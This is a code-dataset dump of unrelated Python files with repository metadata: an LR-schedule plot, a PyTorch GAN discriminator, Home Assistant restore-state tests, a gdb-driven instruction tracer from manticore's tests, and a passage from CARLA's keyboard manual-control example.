    import matplotlib.pyplot as plt
    #x = np.zeros(100)
    #for i in range(100):
    #    x[i]=sigmoid_rampup(i, 50)
    lr_list = []
    # Dead code kept for reference: earlier schedule with cosine rampdown.
    """
    def adjust_learning_rate(epoch, step_in_epoch, total_steps_in_epoch):
        lr =0.4
        lr_rampup = 5.0
        initial_lr = 0.1
        lr_rampdown_epochs = 45
        epoch = epoch + step_in_epoch / total_steps_in_epoch
        # LR warm-up to handle large minibatch sizes from https://arxiv.org/abs/1706.02677
        lr = linear_rampup(epoch, lr_rampup) * (lr - initial_lr) + initial_lr
        # Cosine LR rampdown from https://arxiv.org/abs/1608.03983 (but one cycle only)
        if lr_rampdown_epochs:
            assert lr_rampdown_epochs >= epoch
            lr *= cosine_rampdown(epoch, lr_rampdown_epochs)
        return lr
    """
    def adjust_learning_rate(epoch, lr_sch, step_in_epoch, total_steps_in_epoch):
        # Linear warm-up to lr=0.4 over 5 epochs, then step decay by 10x
        # every lr_sch epochs.
        lr =0.4
        lr_rampup = 5.0
        initial_lr = 0.1
        epoch = epoch + step_in_epoch / total_steps_in_epoch
        print (epoch)
        # LR warm-up to handle large minibatch sizes from https://arxiv.org/abs/1706.02677
        lr = linear_rampup(epoch, lr_rampup) * (lr - initial_lr) + initial_lr
        lr = lr * (0.1 ** (epoch // lr_sch))
        return lr
    # 20 epochs of 5 steps each, decaying every 6 (fractional) epochs.
    for epoch in range(20):
        for step_in_epoch in range(5):
            lr_temp = adjust_learning_rate(epoch, 6, step_in_epoch, 5)
            lr_list.append(lr_temp)
    #plt.ylim(1.0)
    plt.plot(np.asarray(lr_list))
    plt.show()
| 30.21 | 90 | 0.626945 |
c183af7ffeb6468accd5c7a53c5d78328bade4a7 | 1,711 | py | Python | generator/models/discriminator.py | universuen/pokemon_GAN | ac983270820cf55a3eeb74a0d0edd258e715d00b | [
"MIT"
] | 1 | 2021-06-10T11:26:57.000Z | 2021-06-10T11:26:57.000Z | generator/models/discriminator.py | universuen/pokemon_WGAN | ac983270820cf55a3eeb74a0d0edd258e715d00b | [
"MIT"
] | null | null | null | generator/models/discriminator.py | universuen/pokemon_WGAN | ac983270820cf55a3eeb74a0d0edd258e715d00b | [
"MIT"
] | null | null | null | import torch
from torch import nn
def init_weights(layer: nn.Module):
layer_name = layer.__class__.__name__
if 'Conv' in layer_name:
nn.init.normal_(layer.weight.data, 0.0, 0.02)
elif layer_name == 'Linear':
nn.init.normal_(layer.weight.data, 0.0, 0.02)
elif 'Norm' in layer_name:
nn.init.normal_(layer.weight.data, 1.0, 0.02)
nn.init.constant_(layer.bias.data, 0)
class Discriminator(nn.Module):
    """Convolutional discriminator/critic for 3x128x128 images.

    Six strided convolutions shrink the input down to a 1x1 feature map,
    followed by a small linear head. The output is a single raw score per
    image (no sigmoid). Weights are initialised with ``init_weights``.
    """

    def __init__(self):
        super().__init__()
        # Shape comments give the tensor size AFTER the preceding stage.
        self.model = nn.Sequential(
            # 3 * 128 * 128
            nn.Conv2d(3, 32, 4, 2, 1, bias=False),
            nn.GroupNorm(2, 32),
            nn.LeakyReLU(0.2, inplace=True),
            # 32 * 64 * 64
            nn.Conv2d(32, 64, 4, 2, 1, bias=False),
            nn.GroupNorm(4, 64),
            nn.LeakyReLU(0.2, inplace=True),
            # 64 * 32 * 32
            nn.Conv2d(64, 128, 4, 2, 1, bias=False),
            nn.GroupNorm(8, 128),
            nn.LeakyReLU(0.2, inplace=True),
            # 128 * 16 * 16
            nn.Conv2d(128, 256, 4, 2, 1, bias=False),
            nn.GroupNorm(16, 256),
            nn.LeakyReLU(0.2, inplace=True),
            # 256 * 8 * 8
            nn.Conv2d(256, 512, 4, 2, 1, bias=False),
            nn.GroupNorm(32, 512),
            nn.LeakyReLU(0.2, inplace=True),
            # 512 * 4 * 4
            nn.Conv2d(512, 1024, 4, 1, 0, bias=False),
            # 1024 * 1 * 1
            nn.Flatten(),
            nn.Linear(1024, 32, bias=False),
            nn.LeakyReLU(0.2, inplace=True),
            nn.Linear(32, 1, bias=False),
        )
        # Recursively apply the module-level DCGAN-style init.
        self.apply(init_weights)

    def forward(self, x: torch.Tensor):
        """Return a (batch, 1) tensor of raw scores for a (batch, 3, 128, 128) input."""
        return self.model(x)
| 32.283019 | 54 | 0.511981 |
ff38e8fb7637cbef5c48a94bf71693f0658abb3d | 8,469 | py | Python | tests/helpers/test_restore_state.py | zalke/home-assistant | a31e49c857722c0723dc5297cd83cbce0f8716f6 | [
"Apache-2.0"
] | 4 | 2019-07-03T22:36:57.000Z | 2019-08-10T15:33:25.000Z | tests/helpers/test_restore_state.py | zalke/home-assistant | a31e49c857722c0723dc5297cd83cbce0f8716f6 | [
"Apache-2.0"
] | 7 | 2019-08-23T05:26:02.000Z | 2022-03-11T23:57:18.000Z | tests/helpers/test_restore_state.py | zalke/home-assistant | a31e49c857722c0723dc5297cd83cbce0f8716f6 | [
"Apache-2.0"
] | null | null | null | """The tests for the Restore component."""
from datetime import datetime
from homeassistant.const import EVENT_HOMEASSISTANT_START
from homeassistant.core import CoreState, State
from homeassistant.exceptions import HomeAssistantError
from homeassistant.helpers.entity import Entity
from homeassistant.helpers.restore_state import (
RestoreStateData, RestoreEntity, StoredState, DATA_RESTORE_STATE_TASK,
STORAGE_KEY)
from homeassistant.util import dt as dt_util
from asynctest import patch
from tests.common import mock_coro
async def test_caching_data(hass):
    """A restored entity can read its last state back from the store cache."""
    now = dt_util.utcnow()
    # Seed the store with three saved states.
    stored_states = [
        StoredState(State('input_boolean.b0', 'on'), now),
        StoredState(State('input_boolean.b1', 'on'), now),
        StoredState(State('input_boolean.b2', 'on'), now),
    ]
    data = await RestoreStateData.async_get_instance(hass)
    await data.store.async_save([state.as_dict() for state in stored_states])
    # Emulate a fresh load
    hass.data[DATA_RESTORE_STATE_TASK] = None
    entity = RestoreEntity()
    entity.hass = hass
    entity.entity_id = 'input_boolean.b1'
    # Mock that only b1 is present this run
    with patch('homeassistant.helpers.restore_state.Store.async_save'
               ) as mock_write_data:
        state = await entity.async_get_last_state()
    assert state is not None
    assert state.entity_id == 'input_boolean.b1'
    assert state.state == 'on'
    # hass is fully started here, so registering the entity flushes the store.
    assert mock_write_data.called
async def test_hass_starting(hass):
    """While hass is still starting, reads work but nothing is written until startup finishes."""
    hass.state = CoreState.starting
    now = dt_util.utcnow()
    stored_states = [
        StoredState(State('input_boolean.b0', 'on'), now),
        StoredState(State('input_boolean.b1', 'on'), now),
        StoredState(State('input_boolean.b2', 'on'), now),
    ]
    data = await RestoreStateData.async_get_instance(hass)
    await data.store.async_save([state.as_dict() for state in stored_states])
    # Emulate a fresh load
    hass.data[DATA_RESTORE_STATE_TASK] = None
    entity = RestoreEntity()
    entity.hass = hass
    entity.entity_id = 'input_boolean.b1'
    # Mock that only b1 is present this run
    states = [
        State('input_boolean.b1', 'on'),
    ]
    with patch('homeassistant.helpers.restore_state.Store.async_save'
               ) as mock_write_data, patch.object(
                   hass.states, 'async_all', return_value=states):
        state = await entity.async_get_last_state()
    assert state is not None
    assert state.entity_id == 'input_boolean.b1'
    assert state.state == 'on'
    # Assert that no data was written yet, since hass is still starting.
    assert not mock_write_data.called
    # Finish hass startup
    with patch('homeassistant.helpers.restore_state.Store.async_save'
               ) as mock_write_data:
        hass.bus.async_fire(EVENT_HOMEASSISTANT_START)
        await hass.async_block_till_done()
    # Assert that this session states were written
    assert mock_write_data.called
async def test_dump_data(hass):
    """Test which states are persisted by async_dump_states.

    Only entities registered with the RestoreEntity helper (current run) or
    last_states entries that have not yet expired are written; removed
    entities are dropped from subsequent dumps.
    """
    states = [
        State('input_boolean.b0', 'on'),
        State('input_boolean.b1', 'on'),
        State('input_boolean.b2', 'on'),
    ]
    # b0 is a plain Entity (not RestoreEntity) -> must not be persisted.
    entity = Entity()
    entity.hass = hass
    entity.entity_id = 'input_boolean.b0'
    await entity.async_internal_added_to_hass()
    # b1 is a RestoreEntity registered this run -> must be persisted.
    entity = RestoreEntity()
    entity.hass = hass
    entity.entity_id = 'input_boolean.b1'
    await entity.async_internal_added_to_hass()
    data = await RestoreStateData.async_get_instance(hass)
    now = dt_util.utcnow()
    # Seed last_states; b4 has a last_seen far in the past so it is expired.
    data.last_states = {
        'input_boolean.b0': StoredState(State('input_boolean.b0', 'off'), now),
        'input_boolean.b1': StoredState(State('input_boolean.b1', 'off'), now),
        'input_boolean.b2': StoredState(State('input_boolean.b2', 'off'), now),
        'input_boolean.b3': StoredState(State('input_boolean.b3', 'off'), now),
        'input_boolean.b4': StoredState(
            State('input_boolean.b4', 'off'),
            datetime(1985, 10, 26, 1, 22, tzinfo=dt_util.UTC)),
    }
    with patch('homeassistant.helpers.restore_state.Store.async_save'
               ) as mock_write_data, patch.object(
                   hass.states, 'async_all', return_value=states):
        await data.async_dump_states()
    assert mock_write_data.called
    args = mock_write_data.mock_calls[0][1]
    written_states = args[0]
    # b0 should not be written, since it didn't extend RestoreEntity
    # b1 should be written, since it is present in the current run
    # b2 should not be written, since it is not registered with the helper
    # b3 should be written, since it is still not expired
    # b4 should not be written, since it is now expired
    assert len(written_states) == 2
    assert written_states[0]['state']['entity_id'] == 'input_boolean.b1'
    assert written_states[0]['state']['state'] == 'on'
    assert written_states[1]['state']['entity_id'] == 'input_boolean.b3'
    assert written_states[1]['state']['state'] == 'off'
    # Test that removed entities are not persisted
    await entity.async_remove()
    with patch('homeassistant.helpers.restore_state.Store.async_save'
               ) as mock_write_data, patch.object(
                   hass.states, 'async_all', return_value=states):
        await data.async_dump_states()
    assert mock_write_data.called
    args = mock_write_data.mock_calls[0][1]
    written_states = args[0]
    # After removing b1, only the not-yet-expired b3 remains.
    assert len(written_states) == 1
    assert written_states[0]['state']['entity_id'] == 'input_boolean.b3'
    assert written_states[0]['state']['state'] == 'off'
async def test_dump_error(hass):
    """Test that a storage error during a dump does not propagate.

    Store.async_save is made to raise HomeAssistantError; async_dump_states
    must still attempt the write without raising.
    """
    states = [
        State('input_boolean.b0', 'on'),
        State('input_boolean.b1', 'on'),
        State('input_boolean.b2', 'on'),
    ]
    entity = Entity()
    entity.hass = hass
    entity.entity_id = 'input_boolean.b0'
    await entity.async_internal_added_to_hass()
    entity = RestoreEntity()
    entity.hass = hass
    entity.entity_id = 'input_boolean.b1'
    await entity.async_internal_added_to_hass()
    data = await RestoreStateData.async_get_instance(hass)
    # The patched save raises; the dump should swallow/log it, not crash.
    with patch('homeassistant.helpers.restore_state.Store.async_save',
               return_value=mock_coro(exception=HomeAssistantError)
               ) as mock_write_data, patch.object(
                   hass.states, 'async_all', return_value=states):
        await data.async_dump_states()
    assert mock_write_data.called
async def test_load_error(hass):
    """Test that a storage error while loading yields no restored state.

    When Store.async_load raises HomeAssistantError, async_get_last_state
    must return None instead of propagating the exception.
    """
    entity = RestoreEntity()
    entity.hass = hass
    entity.entity_id = 'input_boolean.b1'
    with patch('homeassistant.helpers.storage.Store.async_load',
               return_value=mock_coro(exception=HomeAssistantError)):
        state = await entity.async_get_last_state()
    assert state is None
async def test_state_saved_on_remove(hass):
    """Test that we save entity state on removal.

    Removing a RestoreEntity must snapshot its current state into
    RestoreStateData.last_states so it can be restored on the next run.
    """
    entity = RestoreEntity()
    entity.hass = hass
    entity.entity_id = 'input_boolean.b0'
    await entity.async_internal_added_to_hass()
    hass.states.async_set('input_boolean.b0', 'on')
    data = await RestoreStateData.async_get_instance(hass)
    # No last states should currently be saved
    assert not data.last_states
    await entity.async_remove()
    # We should store the input boolean state when it is removed
    assert data.last_states['input_boolean.b0'].state.state == 'on'
async def test_restoring_invalid_entity_id(hass, hass_storage):
    """Test restoring invalid entity IDs.

    A stored state whose entity_id is invalid (double underscore) must be
    ignored: async_get_last_state returns None rather than the bad record.
    """
    entity = RestoreEntity()
    entity.hass = hass
    entity.entity_id = 'test.invalid__entity_id'
    now = dt_util.utcnow().isoformat()
    # Inject a raw storage payload containing only the invalid entity.
    hass_storage[STORAGE_KEY] = {
        'version': 1,
        'key': STORAGE_KEY,
        'data': [
            {
                'state': {
                    'entity_id': 'test.invalid__entity_id',
                    'state': 'off',
                    'attributes': {},
                    'last_changed': now,
                    'last_updated': now,
                    'context': {
                        'id': '3c2243ff5f30447eb12e7348cfd5b8ff',
                        'user_id': None
                    }
                },
                'last_seen': dt_util.utcnow().isoformat()
            }
        ]
    }
    state = await entity.async_get_last_state()
    assert state is None
| 33.474308 | 79 | 0.659818 |
9d2e479a96dff389d20be201f351ce832d5bf928 | 4,619 | py | Python | tests/auto/trace.py | Srinivas11789/manticore | af3c6aada811833864efaccef7477f14e9b5e0dd | [
"Apache-2.0"
] | null | null | null | tests/auto/trace.py | Srinivas11789/manticore | af3c6aada811833864efaccef7477f14e9b5e0dd | [
"Apache-2.0"
] | null | null | null | tests/auto/trace.py | Srinivas11789/manticore | af3c6aada811833864efaccef7477f14e9b5e0dd | [
"Apache-2.0"
] | null | null | null | from __future__ import print_function
import copy
import sys
import sys
import time
import subprocess
from distorm3 import Decompose, Decode16Bits, Decode32Bits, Decode64Bits, Mnemonics, Registers
count = 0
class Gdb(subprocess.Popen):
def __init__(self, prg, prompt='(gdb) '):
"""Construct interactive Popen."""
self.prompt = prompt
subprocess.Popen.__init__(self, ['gdb', prg], stdin=subprocess.PIPE, stdout=subprocess.PIPE , stderr=subprocess.STDOUT)
def correspond(self, text):
"""Communicate with the child process without closing stdin."""
self.stdin.write(text)
self.stdin.flush()
str_buffer = ''
while not str_buffer.endswith(self.prompt):
str_buffer += self.stdout.read(1)
return str_buffer
def getR(self, reg):
reg = "$"+reg
if "XMM" in reg:
reg = reg+".uint128"
val = self.correspond('p %s\n'%reg.lower()).split("=")[-1].split("\n")[0]
if "0x" in val:
return int(val.split("0x")[-1],16)
else:
return int(val)
if "FLAG" in reg:
reg = "(unsigned) "+reg
if reg in ['$R%dB'%i for i in range(16)] :
reg = reg[:-1] + "&0xff"
if reg in ['$R%dW'%i for i in range(16)] :
reg = reg[:-1] + "&0xffff"
val = self.correspond('p /x %s\n'%reg.lower()).split("0x")[-1]
return long(val.split("\n")[0],16)
def setR(self, reg, value):
self.correspond('set $%s = %s\n'%(reg.lower(), int(value)))
def setByte(self, m, value):
self.correspond('set *(char*)(%s) = %s\n'%(m,value))
def stepi(self):
#print self.correspond("x/i $pc\n")
self.correspond("stepi\n")
def getM(self, m):
try:
return long(self.correspond('x/xg %s\n'%m).split("\t")[-1].split("0x")[-1].split("\n")[0],16)
except Exception as e:
print('x/xg %s\n'%m)
print(self.correspond('x/xg %s\n'%m))
raise e
return 0
def getPid(self):
return int(self.correspond('info proc\n').split("\n")[0].split(" ")[-1])
def getStack(self):
maps = file("/proc/%s/maps"%self.correspond('info proc\n').split("\n")[0].split(" ")[-1]).read().split("\n")
i,o = [ int(x,16) for x in maps[-3].split(" ")[0].split('-')]
print(self.correspond('dump mem lala 0x%x 0x%x\n'%(i,o)))
def getByte(self, m):
arch = self.get_arch()
mask = {'i386': 0xffffffff, 'amd64': 0xffffffffffffffff}[arch]
return int(self.correspond("x/1bx %d\n"%(m&mask)).split("\t")[-1].split("\n")[0][2:],16)
def get_entry(self):
a=self.correspond('info target\n')
return int(a[a.find("Entry point:"):].split('\n')[0].split(' ')[-1][2:],16)
_arch = None
def get_arch(self):
if self._arch is not None:
return self._arch
infotarget = self.correspond('info target\n')
if 'elf32-i386' in infotarget:
self._arch = 'i386'
return 'i386'
elif 'elf64-x86-64' in infotarget:
self._arch = 'amd64'
return 'amd64'
else:
print(infotarget)
raise NotImplementedError()
# --- Script body: drive gdb over the target binary and trace execution ---
gdb = Gdb(sys.argv[1])
# Discard gdb's startup banner (read until the first prompt).
arch = gdb.correspond('')
#guess arch
arch = gdb.get_arch()
#guess architecture from file
entry = gdb.get_entry()
# Break at address 0 so "run" stops immediately, then delete the breakpoint.
gdb.correspond("b *0\n")
gdb.correspond("run arg1 arg2 arg3 < /dev/urandom > /dev/null\n")
gdb.correspond("d 1\n")
# Simulate no vdso (As when analyzed with symbemu)
# Scan the auxv region on the stack for the AT_SYSINFO entries (0x19/0x1f)
# and neutralize them plus any pointer into the vdso mapping.
found = 0
for i in range(75,120):
    if gdb.getM('$sp+sizeof(void*)*%d'%i) ==0x19 and gdb.getM('$sp+%d'%(i+2))==0x1f:
        found = i
if found !=0:
    gdb.setByte('$sp+sizeof(void*)*%d'%found,1)
    gdb.setByte('$sp+sizeof(void*)*%d'%(found+2),1)
    vdso = gdb.getM('$sp+sizeof(void*)*%d'%(found+1))
    for i in range(75,120):
        val = gdb.getM('$sp+sizeof(void*)*%d'%i)
        if val > vdso-0x10000 and val <= vdso+0x10000:
            if (gdb.getM('$sp+sizeof(void*)*%d'%(i-1))) != 1:
                gdb.setByte('$sp+sizeof(void*)*%d'%(i-1),1)
# Instructions that touch the stack (unused here; kept for reference).
STACK_INSTRUCTIONS = ['BOUND', 'CALL', 'CALLF', 'ENTER', 'INT', 'INT1', 'INTO', 'IRET', 'IRETD', 'LEAVE', 'POP', 'POPA', 'POPAD', 'POPF', 'POPFD', 'PUSH', 'PUSHA', 'PUSHAD', 'PUSHF', 'PUSHFD', 'RETF', 'RETN', 'RET']
# Main trace loop: print the pc and full register file after each step.
# NOTE(review): the except branch does not break, so the loop only ends when
# the process is killed externally — confirm this is intended.
while True:
    try:
        stepped = False
        pc = gdb.getR({'i386': 'EIP', 'amd64': 'RIP'}[arch])
        print(hex(pc))
        gdb.stepi()
        print(gdb.correspond('info registers\n'))
    except Exception as e:
        print(e)
        print("# Processed %d instructions." % count)
5fe0a022a25836ade1244d2c385140177caf85f1 | 41,817 | py | Python | roadscene2vec/data/gen/PythonAPI/examples/manual_control_rss.py | AICPS/roadscene2vec | aea84d3aa0e339a58fd92bbee3140df9fa4abde8 | [
"MIT"
] | 8 | 2021-09-03T01:02:48.000Z | 2022-03-15T09:14:31.000Z | roadscene2vec/data/gen/PythonAPI/examples/manual_control_rss.py | waterbearbee/roadscene2vec | aea84d3aa0e339a58fd92bbee3140df9fa4abde8 | [
"MIT"
] | 4 | 2021-09-02T22:23:25.000Z | 2022-02-22T06:39:56.000Z | roadscene2vec/data/gen/PythonAPI/examples/manual_control_rss.py | waterbearbee/roadscene2vec | aea84d3aa0e339a58fd92bbee3140df9fa4abde8 | [
"MIT"
] | 3 | 2022-01-23T09:05:48.000Z | 2022-03-31T21:04:28.000Z | #!/usr/bin/env python
# Copyright (c) 2019 Computer Vision Center (CVC) at the Universitat Autonoma de
# Barcelona (UAB).
# Copyright (c) 2019 Intel Corporation
#
# This work is licensed under the terms of the MIT license.
# For a copy, see <https://opensource.org/licenses/MIT>.
# Allows controlling a vehicle with a keyboard. For a simpler and more
# documented example, please take a look at tutorial.py.
"""
Welcome to CARLA manual control.
Use ARROWS or WASD keys for control.
W : throttle
S : brake
AD : steer
Q : toggle reverse
Space : hand-brake
P : toggle autopilot
M : toggle manual transmission
,/. : gear up/down
T : toggle RSS restrictor
TAB : change sensor position
` : next sensor
[1-9] : change to sensor [1-9]
C : change weather (Shift+C reverse)
Backspace : change vehicle
R : toggle recording images to disk
CTRL + R : toggle recording of simulation (replacing any previous)
CTRL + P : start replaying last recorded simulation
CTRL + + : increments the start time of the replay by 1 second (+SHIFT = 10 seconds)
CTRL + - : decrements the start time of the replay by 1 second (+SHIFT = 10 seconds)
F1 : toggle HUD
H/? : toggle help
ESC : quit
"""
from __future__ import print_function
import glob
import os
import sys
# ==============================================================================
# -- find carla module ---------------------------------------------------------
# ==============================================================================
try:
sys.path.append(glob.glob('../carla/dist/carla-*%d.%d-%s.egg' % (
sys.version_info.major,
sys.version_info.minor,
'win-amd64' if os.name == 'nt' else 'linux-x86_64'))[0])
except IndexError:
pass
# ==============================================================================
# -- imports -------------------------------------------------------------------
# ==============================================================================
import carla
from carla import ColorConverter as cc
import argparse
import collections
import datetime
import inspect
import logging
import math
import random
import re
import weakref
try:
import pygame
from pygame.locals import KMOD_CTRL
from pygame.locals import KMOD_SHIFT
from pygame.locals import K_0
from pygame.locals import K_9
from pygame.locals import K_BACKQUOTE
from pygame.locals import K_BACKSPACE
from pygame.locals import K_COMMA
from pygame.locals import K_DOWN
from pygame.locals import K_ESCAPE
from pygame.locals import K_F1
from pygame.locals import K_LEFT
from pygame.locals import K_PERIOD
from pygame.locals import K_RIGHT
from pygame.locals import K_SLASH
from pygame.locals import K_SPACE
from pygame.locals import K_TAB
from pygame.locals import K_UP
from pygame.locals import K_a
from pygame.locals import K_c
from pygame.locals import K_d
from pygame.locals import K_h
from pygame.locals import K_m
from pygame.locals import K_p
from pygame.locals import K_q
from pygame.locals import K_r
from pygame.locals import K_s
from pygame.locals import K_t
from pygame.locals import K_w
from pygame.locals import K_MINUS
from pygame.locals import K_EQUALS
except ImportError:
raise RuntimeError('cannot import pygame, make sure pygame package is installed')
try:
import numpy as np
except ImportError:
raise RuntimeError('cannot import numpy, make sure numpy package is installed')
# ==============================================================================
# -- Global functions ----------------------------------------------------------
# ==============================================================================
def find_weather_presets():
    """Return ``(carla.WeatherParameters, display name)`` pairs.

    Preset attribute names such as ``ClearNoon`` are split at camel-case
    boundaries to build the human-readable label (``Clear Noon``).
    """
    camel_split = re.compile('.+?(?:(?<=[a-z])(?=[A-Z])|(?<=[A-Z])(?=[A-Z][a-z])|$)')

    def pretty(preset_name):
        # Join the camel-case fragments with spaces.
        return ' '.join(m.group(0) for m in camel_split.finditer(preset_name))

    result = []
    for attr in dir(carla.WeatherParameters):
        # Presets are the capitalized attributes of WeatherParameters.
        if re.match('[A-Z].+', attr):
            result.append((getattr(carla.WeatherParameters, attr), pretty(attr)))
    return result
def get_actor_display_name(actor, truncate=250):
    """Return a human-readable name for *actor*, at most *truncate* chars.

    The name is derived from the actor's ``type_id`` (for example
    ``vehicle.tesla.model3`` becomes ``Tesla Model3``); names longer than
    *truncate* are cut and terminated with an ellipsis.
    """
    fragments = actor.type_id.replace('_', '.').title().split('.')
    display = ' '.join(fragments[1:])
    if len(display) > truncate:
        return display[:truncate - 1] + u'\u2026'
    return display
# ==============================================================================
# -- World ---------------------------------------------------------------------
# ==============================================================================
class World(object):
    """Owns the player actor, its attached sensors and simulation-wide UI state."""

    def __init__(self, carla_world, hud, actor_filter, actor_role_name='hero'):
        self.world = carla_world
        self.actor_role_name = actor_role_name
        self.map = self.world.get_map()
        self.hud = hud
        self.player = None
        self.collision_sensor = None
        self.lane_invasion_sensor = None
        self.gnss_sensor = None
        self.rss_sensor = None
        self.camera_manager = None
        self._weather_presets = find_weather_presets()
        self._weather_index = 0
        self._actor_filter = actor_filter
        self.restart()
        # Feed server timestamps to the HUD every simulation tick.
        self.world.on_tick(hud.on_world_tick)
        self.recording_enabled = False
        self.recording_start = 0

    def restart(self):
        """(Re)spawn the player from a random blueprint and recreate all sensors."""
        # Keep same camera config if the camera manager exists.
        cam_index = self.camera_manager.index if self.camera_manager is not None else 0
        cam_pos_index = self.camera_manager.transform_index if self.camera_manager is not None else 0
        # Get a random blueprint.
        blueprint = random.choice(self.world.get_blueprint_library().filter(self._actor_filter))
        blueprint.set_attribute('role_name', self.actor_role_name)
        if blueprint.has_attribute('color'):
            color = random.choice(blueprint.get_attribute('color').recommended_values)
            blueprint.set_attribute('color', color)
        if blueprint.has_attribute('driver_id'):
            driver_id = random.choice(blueprint.get_attribute('driver_id').recommended_values)
            blueprint.set_attribute('driver_id', driver_id)
        if blueprint.has_attribute('is_invincible'):
            blueprint.set_attribute('is_invincible', 'true')
        # Spawn the player.
        if self.player is not None:
            # Respawn slightly above the old position with level attitude.
            spawn_point = self.player.get_transform()
            spawn_point.location.z += 2.0
            spawn_point.rotation.roll = 0.0
            spawn_point.rotation.pitch = 0.0
            self.destroy()
            self.player = self.world.try_spawn_actor(blueprint, spawn_point)
        while self.player is None:
            # Keep trying random spawn points until one is free.
            spawn_points = self.map.get_spawn_points()
            spawn_point = random.choice(spawn_points) if spawn_points else carla.Transform()
            self.player = self.world.try_spawn_actor(blueprint, spawn_point)
        # Set up the sensors.
        self.collision_sensor = CollisionSensor(self.player, self.hud)
        self.lane_invasion_sensor = LaneInvasionSensor(self.player, self.hud)
        self.gnss_sensor = GnssSensor(self.player)
        self.rss_sensor = RssSensor(self.player)
        self.camera_manager = CameraManager(self.player, self.hud)
        self.camera_manager.transform_index = cam_pos_index
        self.camera_manager.set_sensor(cam_index, notify=False)
        actor_type = get_actor_display_name(self.player)
        self.hud.notification(actor_type)

    def next_weather(self, reverse=False):
        """Cycle to the next (or, with *reverse*, the previous) weather preset."""
        self._weather_index += -1 if reverse else 1
        self._weather_index %= len(self._weather_presets)
        preset = self._weather_presets[self._weather_index]
        self.hud.notification('Weather: %s' % preset[1])
        self.player.get_world().set_weather(preset[0])

    def tick(self, clock):
        """Advance per-frame HUD state."""
        self.hud.tick(self, clock)

    def render(self, display):
        """Draw the camera view and the HUD overlay onto *display*."""
        self.camera_manager.render(display)
        self.hud.render(display)

    def destroy_sensors(self):
        """Destroy only the camera sensor (used before replaying a recording)."""
        self.camera_manager.sensor.destroy()
        self.camera_manager.sensor = None
        self.camera_manager.index = None

    def destroy(self):
        """Destroy the player and every attached sensor actor."""
        actors = [
            self.camera_manager.sensor,
            self.collision_sensor.sensor,
            self.lane_invasion_sensor.sensor,
            self.gnss_sensor.sensor]
        if self.rss_sensor:
            actors.append(self.rss_sensor.sensor)
        actors.append(self.player)
        for actor in actors:
            if actor is not None:
                actor.destroy()
# ==============================================================================
# -- KeyboardControl -----------------------------------------------------------
# ==============================================================================
class KeyboardControl(object):
    """Translates pygame keyboard events into vehicle/walker control commands.

    For vehicles, the produced control may additionally be clamped by the RSS
    restrictor before being applied to the player.
    """

    def __init__(self, world, args):
        self._autopilot_enabled = args.autopilot
        self._world = world
        self._restrictor = None
        self._restrictorEnabled = True
        if isinstance(world.player, carla.Vehicle):
            self._control = carla.VehicleControl()
            world.player.set_autopilot(self._autopilot_enabled)
            self._restrictor = carla.RssRestrictor()
        elif isinstance(world.player, carla.Walker):
            self._control = carla.WalkerControl()
            # Walkers have no autopilot; track heading manually instead.
            self._autopilot_enabled = False
            self._rotation = world.player.get_transform().rotation
        else:
            raise NotImplementedError("Actor type not supported")
        self._steer_cache = 0.0
        world.hud.notification("Press 'H' or '?' for help.", seconds=4.0)

    def parse_events(self, client, world, clock):
        """Handle one frame of pygame events; return True to quit the app."""
        for event in pygame.event.get():
            if event.type == pygame.QUIT:
                return True
            elif event.type == pygame.KEYUP:
                if self._is_quit_shortcut(event.key):
                    return True
                elif event.key == K_BACKSPACE:
                    world.restart()
                elif event.key == K_F1:
                    world.hud.toggle_info()
                elif event.key == K_h or (event.key == K_SLASH and pygame.key.get_mods() & KMOD_SHIFT):
                    world.hud.help.toggle()
                elif event.key == K_TAB:
                    world.camera_manager.toggle_camera()
                elif event.key == K_c and pygame.key.get_mods() & KMOD_SHIFT:
                    world.next_weather(reverse=True)
                elif event.key == K_c:
                    world.next_weather()
                elif event.key == K_BACKQUOTE:
                    world.camera_manager.next_sensor()
                elif event.key > K_0 and event.key <= K_9:
                    world.camera_manager.set_sensor(event.key - 1 - K_0)
                elif event.key == K_r and not (pygame.key.get_mods() & KMOD_CTRL):
                    world.camera_manager.toggle_recording()
                elif event.key == K_r and (pygame.key.get_mods() & KMOD_CTRL):
                    # CTRL+R toggles recording of the simulation itself.
                    if (world.recording_enabled):
                        client.stop_recorder()
                        world.recording_enabled = False
                        world.hud.notification("Recorder is OFF")
                    else:
                        client.start_recorder("manual_recording.rec")
                        world.recording_enabled = True
                        world.hud.notification("Recorder is ON")
                elif event.key == K_p and (pygame.key.get_mods() & KMOD_CTRL):
                    # stop recorder
                    client.stop_recorder()
                    world.recording_enabled = False
                    # work around to fix camera at start of replaying
                    currentIndex = world.camera_manager.index
                    world.destroy_sensors()
                    # disable autopilot
                    self._autopilot_enabled = False
                    world.player.set_autopilot(self._autopilot_enabled)
                    world.hud.notification("Replaying file 'manual_recording.rec'")
                    # replayer
                    client.replay_file("manual_recording.rec", world.recording_start, 0, 0)
                    world.camera_manager.set_sensor(currentIndex)
                elif event.key == K_MINUS and (pygame.key.get_mods() & KMOD_CTRL):
                    # CTRL+- rewinds the replay start (SHIFT = 10s steps).
                    if pygame.key.get_mods() & KMOD_SHIFT:
                        world.recording_start -= 10
                    else:
                        world.recording_start -= 1
                    world.hud.notification("Recording start time is %d" % (world.recording_start))
                elif event.key == K_EQUALS and (pygame.key.get_mods() & KMOD_CTRL):
                    if pygame.key.get_mods() & KMOD_SHIFT:
                        world.recording_start += 10
                    else:
                        world.recording_start += 1
                    world.hud.notification("Recording start time is %d" % (world.recording_start))
                if isinstance(self._control, carla.VehicleControl):
                    # Vehicle-only key bindings (gears, autopilot, RSS toggle).
                    if event.key == K_q:
                        self._control.gear = 1 if self._control.reverse else -1
                    elif event.key == K_m:
                        self._control.manual_gear_shift = not self._control.manual_gear_shift
                        self._control.gear = world.player.get_control().gear
                        world.hud.notification('%s Transmission' %
                                               ('Manual' if self._control.manual_gear_shift else 'Automatic'))
                    elif self._control.manual_gear_shift and event.key == K_COMMA:
                        self._control.gear = max(-1, self._control.gear - 1)
                    elif self._control.manual_gear_shift and event.key == K_PERIOD:
                        self._control.gear = self._control.gear + 1
                    elif event.key == K_p and not (pygame.key.get_mods() & KMOD_CTRL):
                        self._autopilot_enabled = not self._autopilot_enabled
                        world.player.set_autopilot(self._autopilot_enabled)
                        world.hud.notification('Autopilot %s' % ('On' if self._autopilot_enabled else 'Off'))
                    elif event.key == K_t:
                        self._restrictorEnabled = not self._restrictorEnabled
                        world.hud.notification('RSS Restrictor %s' % ('On' if self._restrictorEnabled else 'Off'))
        if not self._autopilot_enabled:
            if isinstance(self._control, carla.VehicleControl):
